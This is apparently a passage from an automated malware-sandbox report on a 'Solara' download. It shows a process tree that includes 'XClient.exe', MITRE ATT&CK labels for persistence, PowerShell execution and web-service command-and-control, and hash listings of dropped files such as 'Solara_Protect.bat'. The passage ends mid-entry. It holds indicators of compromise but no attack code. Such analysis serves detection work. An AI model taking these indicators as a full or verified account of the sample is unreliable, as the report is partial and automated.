    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.2.179795202\897035016" -childID 1 -isForBrowser -prefsHandle 3056 -prefMapHandle 2952 -prefsLen 20888 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {80d1f89b-3fd6-4cbe-b982-039a359988b8} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 3208 1e7895c5f58 tab
    3⤵
    PID:3216
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.3.1866736029\1043454601" -childID 2 -isForBrowser -prefsHandle 3588 -prefMapHandle 3584 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {adb4d41e-da09-49c1-814a-8dac9250351e} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 3600 1e7f185f558 tab
    3⤵
    PID:1160
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.4.191300101\788793555" -childID 3 -isForBrowser -prefsHandle 4532 -prefMapHandle 4648 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {39092794-236a-474e-9a59-ccbcf7ae6f29} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 4656 1e78b2a9758 tab
    3⤵
    PID:5356
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.5.606891755\296892075" -childID 4 -isForBrowser -prefsHandle 5072 -prefMapHandle 5052 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {baaa3045-3e25-4242-bda9-29c1dd1edfc1} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 5068 1e78bbb6958 tab
    3⤵
    PID:5776
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.6.1038430401\797689001" -childID 5 -isForBrowser -prefsHandle 5208 -prefMapHandle 5212 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {14b840a9-3594-4c9e-ae0d-5e194c594c4c} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 5200 1e78bbb5158 tab
    3⤵
    PID:5792
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.7.725132788\1837089629" -childID 6 -isForBrowser -prefsHandle 5396 -prefMapHandle 5400 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5603c1c0-600a-4945-8a4b-7863c8b1ae7d} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 5388 1e78bbb5458 tab
    3⤵
    PID:5800
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.8.418852028\1251578625" -childID 7 -isForBrowser -prefsHandle 5072 -prefMapHandle 5232 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {14569905-487d-4b11-916e-16e85afa5ad7} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 5964 1e789524e58 tab
    3⤵
    PID:5892
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.9.1927054615\213791461" -childID 8 -isForBrowser -prefsHandle 3528 -prefMapHandle 2824 -prefsLen 26725 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5db436d-d670-43de-9d74-57874eabc025} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 3068 1e7852f2558 tab
    3⤵
    PID:2320
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.10.303666136\2016900388" -parentBuildID 20221007134813 -prefsHandle 3548 -prefMapHandle 4692 -prefsLen 26725 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {48f6e0fb-f892-4356-b074-03fe73e635ca} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 3068 1e785656d58 rdd
    3⤵
    PID:2128
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.11.1903525523\1222888480" -childID 9 -isForBrowser -prefsHandle 10084 -prefMapHandle 10044 -prefsLen 26725 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9376c6cd-f39a-4f3c-93be-d228b2408934} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 10100 1e78560cd58 tab
    3⤵
    PID:6732
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4612.12.1546401626\2013547121" -childID 10 -isForBrowser -prefsHandle 9848 -prefMapHandle 9820 -prefsLen 26734 -prefMapSize 233444 -jsInitHandle 1140 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc5c9d42-7063-45e1-8988-320bc0d2fa80} 4612 "\\.\pipe\gecko-crash-server-pipe.4612" 9924 1e78d2f5658 tab
    3⤵
    PID:6424

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3700 --field-trial-handle=2272,i,4858140932023865871,5726683989663339295,262144 --variations-seed-version /prefetch:8
1⤵
PID:5156

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
PID:3548

C:\Users\Admin\XClient.exe
C:\Users\Admin\XClient.exe
1⤵
PID:2436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2108 -ip 2108
1⤵
PID:3232

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9751fcb3d8dc82d33d50eebe53abe314

SHA1
7a680212700a5d9f3ca67c81e0e243834387c20c

SHA256
ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7

SHA512
54907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
06ad34f9739c5159b4d92d702545bd49

SHA1
9152a0d4f153f3f40f7e606be75f81b582ee0c17

SHA256
474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

SHA512
c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
22eea905ffa77c5a3385f0832a02957b

SHA1
9bd5136178cfd691d459cf4a9b5c99d8b904a5d7

SHA256
de772b39357ac3dfc03ff2dbe2abaf011883c63321a7983dbe2934f3e0d3016f

SHA512
6dee71fb6a16b4f17a52f1abfe76233270b6bec08f2cf8822ad8e62ebd70a9a9409cf31ab2c2fdc18ed9f428c98c3bd0c942e7f25099d292fe2ad50155fcba1c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
35ca10002bc51a9e42e5392ef696c43e

SHA1
04a227712c93135eefdce3486b45cdd23c94751b

SHA256
4441391c9db0e553148b57d1359bb0737726f1de3eb28864196d7381b606bcca

SHA512
23d2f3c45b91be7a62582ffe5dff2b5002c00df7d4fb3fea23d59579b6b2e932babb2678ff28e598d9f171329dbcbe7fce246759285f6599cbe7e1c81b5777e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
361239beb8c75f4d9c95197ae524d6e9

SHA1
ce34c0a7c550a4ece2562d9186f39306e7062e1b

SHA256
14943fa82b9c5bb38e9450e980c1586bc9766ee3289c6dd71eeed8349cf302a8

SHA512
986a5aeb0a22f7f00f50e9c28056c1a01313af3a7bac2d9ad28368276ca6dd884451001f15b793068d7ef0d5df0a65f03140e2235990bd4a992f5b61c6f7d10a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
98cea9206d332b6559761ee7a9110e0d

SHA1
2e8e7574ff6fa3a34c80771e4f1c0354a839d8f9

SHA256
de7a5d0c6327ed2f94a70480314908f38c7c7d3bd1f4560e33f4b99758af87da

SHA512
e1b1507aae5553d6dc374bba9fd5251658ce0bcc7418660df6d4a347d8f28bfe35f90014ddc43b44b1636459825b0acf42574cd0e520f36faa398635f32b9b10

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\13909

Filesize
10KB

MD5
22f422620b1645edcd0a1b31178fa667

SHA1
b84a243e7e5dbfe9ed85e3d0bd6eba4a79c5ffc9

SHA256
f836455b7856f7e90dc2331f7c2b2e86b4703c966505efc6ad8339614cb9fec4

SHA512
638a0bdb2cb35899310d33079db619651e5268e39e94c7b57cc1203298fcc6823ac5d597ae4ddd29aee6fa222e3a81d486a73fd9d9bdee577ffbd17a852f5819

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\14395

Filesize
11KB

MD5
dcae8de148e0324287351f6e0b470e0c

SHA1
20fd2d3538bc0fb22437375229c733e549699df1

SHA256
96092e6f1a58f51a0b4db3660df7714a4ee570aa53796efa193b04c1f3fb7796

SHA512
dc3ffd05210a8438146041c53c5520b5f19c78c57b0af4f455ffd9879b90692fbad873d9dc766871bffa797c89751b82236348a91d148683babb5c655cc76900

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\14982

Filesize
10KB

MD5
a8ca2b319436e5db078bb3e418efcebf

SHA1
3af56b8254f2d384124229234a8b964ef4c58218

SHA256
da255d4cea3ed492cae5f9e746176f2129c3f2aec58f4c26817151901ec1cc85

SHA512
0a1febba49ae6756e875cf26e23cb2f3a3fc84f2a6a8f13a0ba6645f24fe8bf822884ad90f14ff928950c748c7a2b817ece2990afd2256a0d3b2f01a76751f50

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\15368

Filesize
11KB

MD5
350e1ed407a7f8f4a837a4c1c07ddf19

SHA1
c29df0a0f244e28ac00bc78b8ae0abf2d9a45ff3

SHA256
937595ed9b479b6c833a5cd31bbf3c2e55d5a107406513fb1d63512ce4652637

SHA512
3524538ed5c807182aab9b1a6d605a8ab9ccaaa3dcee561de70e122a1e3df8be37d32813085b143ba4f42f1ef2a16bde8c9089b015ecf38b2f86376ec9f8d06d

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\15788

Filesize
9KB

MD5
b6aa11e67d61f24a23ace1021af326f6

SHA1
93aaaf1a6e01e4c243ac03a87735f13ac6899ff9

SHA256
95a284315fd925e5b6d7c34e6b409d2db03f240f5a42333ae3d5331371cc26c1

SHA512
d2ec463dc84f6eb82ba89ce46a6ef1d2e617f57383dcf1e8da29d292d10984285b109143406b5df40250b65e5f9e84c1cffa31cf235141982992d3e076d6b097

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\16440

Filesize
10KB

MD5
2008f2c8c78166deacf46520b8efde1c

SHA1
d1896db463ad9fac46678ba3cdd03e9285de7c9d

SHA256
0c7824f2f146fc2a28a7ca857c5e80d75b4f95c7b9cc2e50fde038c8490c6033

SHA512
9615919f78e2cd9e4565aa991b90c9df393effa9a0e258a8866df6d7a7cd3f91d91b27c02144eed9c1b588718197ed90043a1421e82e5deb88172b3e6c0d545a

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\19229

Filesize
10KB

MD5
937445507c38fb54f8aba6a61e843746

SHA1
d446e25a2fb8f877fc54975ac698602a8ace205d

SHA256
0d089b3b4ab0dc03372e4b41098f865bae341fe3d653c036d98dc14472af0e13

SHA512
4c191f161e2ea6d1f341ee353fd40a759357ee2a0abaf08472d3c663129cdc613cc61346cbee03db62f3e65419707da4164a8a5dc69c08c9adcd2e226d5c927c

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\20889

Filesize
10KB

MD5
fe98367d66308e52d7c7969144395a8a

SHA1
f488f0cbff9b9c23d956d3ec6814beedd5a2a220

SHA256
415ad48490d8b9787d4de810a551d97a4704b44f2f42ac550a0362a4d04b5e01

SHA512
424cb6b59185983ae22a3395769a2b3008de8e45e087a8e7719f1e12202da88e1b656f32912721200b1d37ff19c7855e23fb87e9124b61a3b0de65b27ca13f96

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\20975

Filesize
11KB

MD5
cf4853380233ac649e88d8ab7d9e53d1

SHA1
d22c76cbc9ddb15d8009a71bdd1929bd9bf1171f

SHA256
0239db3bce364946ed5d646435b8d6cf253bf6e78689a8142875a5f9b6be6111

SHA512
492794bb55ca1f7bf154a9945aa34e1730d5be7ff08dea67fa0c773bebe1bd54bc4c42f4265e20df2ba5d202280906b53d39c88088a0301a0c176f3db0113f46

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\22461

Filesize
10KB

MD5
b7ce6fe1fe4a9aae92d6d6175fbc39a1

SHA1
487e7fe516fa77d73bf48fd18008c78115584247

SHA256
af812b897625157861635d3d0bdf81a716f790d050c545bc8111cae9fc4a01d6

SHA512
b311122969c122e9647981dfafa693987547643c48479a4c940a4bb1b7d9d5818ebe0f3b92963c07292ecc85a7301567bc597e9918100c19b040fb8f994f0638

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\22618

Filesize
11KB

MD5
56c25c74c7af2bee6a621401b8f7f5c4

SHA1
e1c23a466bbbcd625ea350c999c40811cbb1012f

SHA256
341d38ee8a7ed8bace7c6cf14d49e49e35bc7b958ea9a0a2f56fcfcc545653dd

SHA512
1b1f409db74d95aa2c55cd7323eeb4deeb01c943933e3c9df84c5315da336904e958896d235915f5e5b2426a200272e8d4672716c37f6b0953a4dea6d43627d3

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\23389

Filesize
9KB

MD5
1d821f910d776aa2cd2e62f67ce43dee

SHA1
81ec42bf917967d9bdb6c241c97983b9fd3950e8

SHA256
9a419acb94c072b2b7082526a91cac4f9d9297978d71215992b7b1958b2fbc0a

SHA512
09b77fd1b8424386ce25c0135f5bea434ad69154968ba5fbf3d5c29268164c1704f818e6e4794bc45f8ce569325cc3485c44cf3280a408483a79c4c07e9d9d79

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\2469

Filesize
10KB

MD5
a4c28e41f558a72018701b84ad4ccf4a

SHA1
b5767e13a58026ce24f052cb174f37312eb960d2

SHA256
7e32b6a915539b1e4b38be22d6275081640215cc809c98289fd722e58d30fc2f

SHA512
f0a749db73bac4f1c44629321a0e691838eb56c351584b419336122adb5bc99c1b31b227da41c39c59d176a38cf6179b7f80cf3bbb3ad3cd0eca8b6f14faae8a

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\2699

Filesize
11KB

MD5
aac40eb19a49b4a56d9dc03774dd9a70

SHA1
ab457bbb061db8ec6e344c524fb6a04dba266257

SHA256
a50a6f81557312d2bae250777c7257622f605162da4b01ce391a0cf65f6f0526

SHA512
ae413dc6645152afd21cb754a3553fd5a65e5b660495240533a494427bebabf2a0be45f7897e2371232b85e81666d567da4f8c60c93fc130082572e457fa2dc9

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\27586

Filesize
10KB

MD5
98486167e9b2ec42c1486105adb33be2

SHA1
1ef4f55bd2bcfdf4a4ed0801e97d3a4a1849fcd1

SHA256
f2bd999d7d7c8a04a6ee9bb268d4411282f8240795b85f5d6d21a10f6ff08466

SHA512
d357fce7afd15eeea04f36976235300ff358f818c2640f6932055a661be6015253f75c548991b3b6bc4bc0d2fb245f47d3a8f1a810fcff896a1ee3e2a352a604

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\27866

Filesize
11KB

MD5
48d3e3af822bea11ef514b4e8f22a811

SHA1
39aff458c2b248220e5c322efe474171d8765819

SHA256
d1b165516d11ac281a326cbf417fc58756f6cee4d70cd445ad1b97e7e683b0c4

SHA512
09c4cfaf9116396ad06f86351293d4a193d0cb57875eaa4916a4a8ada4371a0dd00f2c42c290f9361ec1279e385bb69ca84758117dd30d721276d5b5a68df891

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\31074

Filesize
10KB

MD5
1fd466ce7cb7d6d5d5ab4d0753f5d41d

SHA1
4b93223b6ad725147516addd3523d2730f0ed19c

SHA256
52ede2888f4cf588934a629f149368297c58f2f2bb10ac616bb3dc74f46bda5b

SHA512
9826a5a18610e63e8fb54b96b6c619ba5f806e7122220c1574790011a9420a895568d9dec57557ee5229a91bb7d67d6c01de0f936f3501ceefe993b10b7dcd54

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\31182

Filesize
10KB

MD5
c5e516d65aae9cf36ebf2f4d68822507

SHA1
b289b3308daf81ffa3da26a34044bd07e48f5d7d

SHA256
5d228e82f91ce991f068238302417b84d9725f687fcce1525af7bacca6d68dfc

SHA512
ecf6dc0a4e792c3b8c36a5a1fff0e80fd39ad75018110718b62321ba25c68ee3a1f275c0e2a948d6b40bb22e6cdd0565e0140b09f7762858990189a05d6147ac

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\4106

Filesize
11KB

MD5
d21b4c3b6ac9423a1605bb6963bcd357

SHA1
c90f9dc4c2f6e7f551009b696028370c901991bc

SHA256
570b784f043d63e2cfdc37567acb4b22004d1cc19a7b43fb0e8224318ca59c4c

SHA512
37eed499187258c65d0c4a3c3b03a40dcad7fca26c6b04e2fe07a43657b2e39263a0cf22dc36124dbbcf6342890f3c53868bdb925366e3ae15555e871e9813bf

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\8114

Filesize
10KB

MD5
53884bff0b5ce266abd64a116288ca6f

SHA1
cc88a6599d97de053bda2cc3e8a211f6f30c2786

SHA256
44709c793e62ec5f1e47e5b6d53921b924cd1ebcca8ad87a3df006d8411337f0

SHA512
26e52fa3c770fd7783250a51f150d3de4a9bf0354b48672a006d1ffa8c5342a98856dd637102181102903a85760351bf7292f383be8d3f7110d1ab95990a78d8

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\8114

Filesize
11KB

MD5
f0af0b1897490c32490efca96593f608

SHA1
ba77a49e2e499fd689d436949d1093cbb3f559c3

SHA256
dfbda3ecc43c05bce8a70d73721e39a1348b9a6c313e414e792249ee12219d78

SHA512
a8484a4a3038a85ca64f71e95b08abaab304616e0c6a3339b46e6808aa6551cc11b7d28d1998d14d7d0d8b8e753524ccaaa52da33b561043f1649516bfc6a384

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\9432

Filesize
10KB

MD5
0eda4de408a4b10a1f9b6d534abfbf0b

SHA1
041973c670612dc410796de8ac55d53e9f0f1b55

SHA256
4a9d96dd3c2391d7865a61727791f0c1a8390fc63a1a4602c535f9a0bc41d5ad

SHA512
2e2d871e5fa11536fd38e7b373d125aa2cc19df4cd5bd44675719cc7fa894281e4a5ed5463e2a878f198d3f4e8098b9ae7f9412ba9bf58335276e10b99fcd66a

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\entries\0D0C8B41B123A60A76177A339C5D673D74E526C6

Filesize
96KB

MD5
533739e4a95abf74610506cac11451cc

SHA1
b77cf92924125e6f7819d6508f4786c3c7e0078f

SHA256
46020e0f84858139316030d83b8caed4e84221b0e05706ae1a59728ec2cd81fa

SHA512
199f64aa53b8030e0444f2cd9fdbf152ccfa469d1c592fcca74b092ad4a1f650dea5931314606b56cade57b6f162387c7f0d9cc2a096c5cbf76d2a016730dea4

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\entries\A14C26BA4DDEF07ECA3E158614497D4ED03032A2

Filesize
60KB

MD5
4e13b60927b14cf7ce0c432c8ade1a56

SHA1
390f9c4eb4ac22ac37372155a165e68cb5f443a6

SHA256
4c24e5edba2fee1681313714088aa9dee3ed8f8cf14b1381381db3e6e936368a

SHA512
fd13fdaa87a53c4c9ba11346081b640331a09111b4cf8ce008aabe81cf36f40fec45761d793a6a039535b32703805dea664ff8f97c666ddddf3aea33590ab2e5

Download Submit
C:\Users\Admin\AppData\Local\Solara\Solara_Protect.bat

Filesize
3.1MB

MD5
49f8779d69c5572c5534a2b83f90334b

SHA1
edbeaff47d9b2fe4244b9710e014924189c086b6

SHA256
e3120bc12c0d1c82b3d719e8d095fcee2bba9571d2ad85e9e2b1b2dae921cc49

SHA512
a34cb31c8bdccced3167a1df44e6635cf66ddc544246115639727611aab578e576e98297be42d9496971da4b35db5f8359b8b06499009d885269e3ad3e5fd6bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Microsoft.Web.WebView2.Core.dll

Filesize
488KB

MD5
851fee9a41856b588847cf8272645f58

SHA1
ee185a1ff257c86eb19d30a191bf0695d5ac72a1

SHA256
5e7faee6b8230ca3b97ce9542b914db3abbbd1cb14fd95a39497aaad4c1094ca

SHA512
cf5c70984cf33e12cf57116da1f282a5bd6433c570831c185253d13463b0b9a0b9387d4d1bf4dddab3292a5d9ba96d66b6812e9d7ebc5eb35cb96eea2741348f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Microsoft.Web.WebView2.WinForms.dll

Filesize
37KB

MD5
4cf94ffa50fd9bdc0bb93cceaede0629

SHA1
3e30eca720f4c2a708ec53fd7f1ba9e778b4f95f

SHA256
50b2e46c99076f6fa9c33e0a98f0fe3a2809a7c647bb509066e58f4c7685d7e6

SHA512
dc400518ef2f68920d90f1ce66fbb8f4dde2294e0efeecd3d9329aa7a66e1ab53487b120e13e15f227ea51784f90208c72d7fbfa9330d9b71dd9a1a727d11f98

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Microsoft.Web.WebView2.Wpf.dll

Filesize
43KB

MD5
34ec990ed346ec6a4f14841b12280c20

SHA1
6587164274a1ae7f47bdb9d71d066b83241576f0

SHA256
1e987b22cd011e4396a0805c73539586b67df172df75e3dded16a77d31850409

SHA512
b565015ca4b11b79ecbc8127f1fd40c986948050f1caefdd371d34ed2136af0aabf100863dc6fd16d67e3751d44ee13835ea9bf981ac0238165749c4987d1ae0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\get-intrinsic\.nycrc

Filesize
139B

MD5
d0104f79f0b4f03bbcd3b287fa04cf8c

SHA1
54f9d7adf8943cb07f821435bb269eb4ba40ccc2

SHA256
997785c50b0773e5e18bf15550fbf57823c634fefe623cd37b3c83696402ad0a

SHA512
daf9b5445cfc02397f398adfa0258f2489b70699dfec6ca7e5b85afe5671fdcabe59edee332f718f5e5778feb1e301778dffe93bb28c1c0914f669659bad39c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\has-proto\.eslintrc

Filesize
43B

MD5
c28b0fe9be6e306cc2ad30fe00e3db10

SHA1
af79c81bd61c9a937fca18425dd84cdf8317c8b9

SHA256
0694050195fc694c5846b0a2a66b437ac775da988f0a779c55fb892597f7f641

SHA512
e3eca17804522ffa4f41e836e76e397a310a20e8261a38115b67e8b644444153039d04198fb470f45be2997d2c7a72b15bd4771a02c741b3cbc072ea6ef432e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\hasown\.nycrc

Filesize
216B

MD5
c2ab942102236f987048d0d84d73d960

SHA1
95462172699187ac02eaec6074024b26e6d71cff

SHA256
948366fea3b423a46366326d0bb2e54b08abd1cf0b243678ba6625740c40da5a

SHA512
e36b20c16ceeb090750f3865efc8d7fd983ae4e8b41c30cc3865d2fd4925bf5902627e1f1ed46c0ff2453f076ef9de34be899ef57754b29cd158440071318479

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\fileaccess\node_modules\vary\LICENSE

Filesize
1KB

MD5
13babc4f212ce635d68da544339c962b

SHA1
4881ad2ec8eb2470a7049421047c6d076f48f1de

SHA256
bd47ce7b88c7759630d1e2b9fcfa170a0f1fde522be09e13fb1581a79d090400

SHA512
40e30174433408e0e2ed46d24373b12def47f545d9183b7bce28d4ddd8c8bb528075c7f20e118f37661db9f1bba358999d81a14425eb3e0a4a20865dfcb53182

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\index.html

Filesize
20KB

MD5
08d9ac1e35385587b0c3c8a73ea97234

SHA1
d1db15b5e97152be999339d90630f68ed06a6b78

SHA256
016cadaa9a8494b15efea920a5ea9c02b441e90dbc7c444e73db3b307f93a741

SHA512
8061a5a92f828642ea2fcb319571efa406ed67a75b4d4da1aeb3da96391a72fcde670e3e52efef62d37ddc17f7eca5afa0d35aa02bfd1bcadd8e86240cb802a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\vs\basic-languages\lua\lua.js

Filesize
5KB

MD5
8706d861294e09a1f2f7e63d19e5fcb7

SHA1
fa5f4bdc6c2f1728f65c41fb5c539211a24b6f23

SHA256
fc2d6fb52a524a56cd8ac53bfe4bad733f246e76dc73cbec4c61be32d282ac42

SHA512
1f9297eb4392db612630f824069afdc9d49259aba6361fb0b87372123ada067bc27d10d0623dc1eb7494da55c82840c5521f6fef74c1ada3b0fd801755234f1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\vs\editor\editor.main.css

Filesize
171KB

MD5
233217455a3ef3604bf4942024b94f98

SHA1
95cd3ce46f4ca65708ec25d59dddbfa3fc44e143

SHA256
2ec118616a1370e7c37342da85834ca1819400c28f83abfcbbb1ef50b51f7701

SHA512
6f4cb7b88673666b7dc1beab3ec2aec4d7d353e6da9f6f14ed2fee8848c7da34ee5060d9eb34ecbb5db71b5b98e3f8582c09ef3efe4f2d9d3135dea87d497455

Download Submit
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\Monaco\vs\editor\editor.main.js

Filesize
2.0MB

MD5
9399a8eaa741d04b0ae6566a5ebb8106

SHA1
5646a9d35b773d784ad914417ed861c5cba45e31

SHA256
93d28520c07fbca09e20886087f28797bb7bd0e6cf77400153aab5ae67e3ce18

SHA512
